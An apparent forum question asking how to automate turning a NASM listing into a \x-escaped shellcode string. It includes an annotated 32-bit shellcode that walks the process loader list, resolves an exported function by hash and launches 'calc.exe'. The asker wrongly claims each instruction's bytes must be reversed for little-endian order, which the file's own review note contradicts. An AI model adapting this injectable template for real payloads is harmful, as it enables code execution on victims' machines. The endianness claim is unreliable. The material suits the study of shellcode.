Let's say I have the assembly file as follows:
; NASM syntax, 32-bit code (BITS 32).  Position-independent: no absolute
; addresses are used, only short relative jumps and one indirect `call ebp`
; (see the listing below: E3/75/E0 relative forms, FF D5).  There is no
; prologue/epilogue; the block ends with `ret` (eax = 0) followed by `int3`.
;
; Register roles, as read from the code below:
;   esi - walks a singly linked list reached through fs:[0x30] ([esi] = next)
;   ebp - value taken from each list node at +0x8; later becomes the call
;         target after `add ebp,[edi+edx*4]`
;   ebx - ebp + [ebp + [ebp+0x3c] + 0x78]  (a table reached by fixed offsets)
;   ecx - l2 loop counter, initialised from [ebx+0x18]
;   edi - byte pointer scanned by the l3 loop (xor dl,[edi] / scasb)
;   dx  - 16-bit value accumulated in l3 and compared against 0xf510
;
; NOTE(review): the fixed offsets (fs:+0x30, +0xc, +0x1c, +0x8, +0x3c, +0x78,
; +0x18..+0x24) assume a specific OS/loader in-memory layout that this file
; does not declare - cannot be confirmed from here.
; NOTE(review): the NASM listing prints each instruction's encoding bytes in
; memory order; only multi-byte immediates inside an encoding are stored
; little-endian (e.g. `push 0xdead1337` -> 68 37 13 AD DE in the listing).
BITS 32
and dword [edi], 0xFFFFFFFE        ; clear bit 0 of the dword at [edi]; runs before pushad, edi is whatever the caller left in it
pushad                             ; save all eight GPRs; undone by popad before ret
push 0xdead1337                    ; stack marker; l10 pops until it reappears
xor esi,esi
push esi                           ; pushes 0 above the marker (consumed by l10)
mov esi,[fs:esi+0x30]              ; esi = fs:[0x30] (esi is 0 here)
mov esi,[esi+0xc]
mov esi,[esi+0x1c]                 ; esi -> first list node
l1:                                ; --- per-node loop ---
mov ebp,[esi+0x8]                  ; ebp = node field at +0x8
mov esi,[esi]                      ; esi = node->next
mov ebx,[ebp+0x3c]
mov ebx,[ebp+ebx+0x78]
add ebx,ebp                        ; ebx = ebp + [ebp + [ebp+0x3c] + 0x78]
mov ecx,[ebx+0x18]                 ; ecx = entry count for the l2 loop
jcxz l1                            ; NOTE(review): encoded with a 0x67 prefix (listing: 67E3), so only cx is tested, not ecx - a count that is a multiple of 0x10000 is treated as zero
l2:                                ; --- per-entry loop, ecx counts down ---
mov edi,[ebx+0x20]
add edi,ebp
mov edi,[edi+ecx*4-0x4]            ; entry (ecx-1) of the dword table at ebp+[ebx+0x20]
add edi,ebp                        ; edi -> NUL-terminated byte string
xor eax,eax                        ; al = 0 is the scasb comparand
cdq                                ; edx = 0 (sign-extension of eax = 0)
l3:                                ; --- byte loop: fold the string into dx ---
xor dl,[edi]
ror dx,0x1                         ; 16-bit rotate: only dx carries state
scasb                              ; compare al (0) with [edi], then edi += 1 - assumes DF = 0; there is no cld in this file
jnz l3                             ; exit after the NUL byte has been folded in
cmp dx,0xf510                      ; 16-bit compare: any string with the same low-16 fold also matches
loopne l2                          ; ecx -= 1 (full 32-bit, listing: E0E3); continue while ecx != 0 and no match
jnz l1                             ; table exhausted without a match: next node
mov edx,[ebx+0x24]
add edx,ebp
movzx edx,word [edx+ecx*2]         ; 16-bit index for entry ecx (loopne already decremented ecx to the matched entry's index)
mov edi,[ebx+0x1c]
add edi,ebp
add ebp,[edi+edx*4]                ; ebp = call target
push dword 0x6578652e              ; two dwords form an 8-byte buffer on the stack ...
push dword 0x636c6163
push esp                           ; ... followed by a pointer to it
xchg eax,[esp]                     ; eax = that pointer, [esp] = 0 (eax was 0)
push eax                           ; stack now: pointer, 0, buffer, marker ...
call ebp                           ; callee's stack cleanup is not known here; l10 resynchronises esp
l10:                               ; --- pop until the marker pushed above is found ---
pop eax
cmp eax, 0xdead1337
jne l10
popad                              ; restore the GPRs saved on entry
xor eax,eax
ret                                ; returns 0
int3                               ; not reached after ret; traps if fallen into
I can run it through NASM to assemble it and it will show the hex opcodes for each instruction next to them as follows:
00000000 8327FE and dword [edi],byte -0x2
00000003 60 pushad
00000004 683713ADDE push dword 0xdead1337
00000009 31F6 xor esi,esi
0000000B 56 push esi
0000000C 648B7630 mov esi,[fs:esi+0x30]
00000010 8B760C mov esi,[esi+0xc]
00000013 8B761C mov esi,[esi+0x1c]
00000016 8B6E08 mov ebp,[esi+0x8]
00000019 8B36 mov esi,[esi]
0000001B 8B5D3C mov ebx,[ebp+0x3c]
0000001E 8B5C1D78 mov ebx,[ebp+ebx+0x78]
00000022 01EB add ebx,ebp
00000024 8B4B18 mov ecx,[ebx+0x18]
00000027 67E3EC jcxz 0x16
0000002A 8B7B20 mov edi,[ebx+0x20]
0000002D 01EF add edi,ebp
0000002F 8B7C8FFC mov edi,[edi+ecx*4-0x4]
00000033 01EF add edi,ebp
00000035 31C0 xor eax,eax
00000037 99 cdq
00000038 3217 xor dl,[edi]
0000003A 66D1CA ror dx,1
0000003D AE scasb
0000003E 75F8 jnz 0x38
00000040 6681FA10F5 cmp dx,0xf510
00000045 E0E3 loopne 0x2a
00000047 75CD jnz 0x16
00000049 8B5324 mov edx,[ebx+0x24]
0000004C 01EA add edx,ebp
0000004E 0FB7144A movzx edx,word [edx+ecx*2]
00000052 8B7B1C mov edi,[ebx+0x1c]
00000055 01EF add edi,ebp
00000057 032C97 add ebp,[edi+edx*4]
0000005A 682E657865 push dword 0x6578652e
0000005F 6863616C63 push dword 0x636c6163
00000064 54 push esp
00000065 870424 xchg eax,[esp]
00000068 50 push eax
00000069 FFD5 call ebp
0000006B 58 pop eax
0000006C 3D3713ADDE cmp eax,0xdead1337
00000071 75F8 jnz 0x6b
00000073 61 popad
00000074 31C0 xor eax,eax
00000076 C3 ret
00000077 CC int3
Now, what I want to do is extract all the hex opcode bytes from the listing above and format them as a shellcode string in \x<hex byte> format.
For instance the first two instructions:
00000000 8327FE and dword [edi],byte -0x2
00000003 60 pushad
would be written as: \xFE\x27\x83\x60 (in Little Endian Format).
I am doing this manually but is there a way to automate this?
Any help would be appreciated; please note that this is only for learning purposes.
Regards,
NeonFlash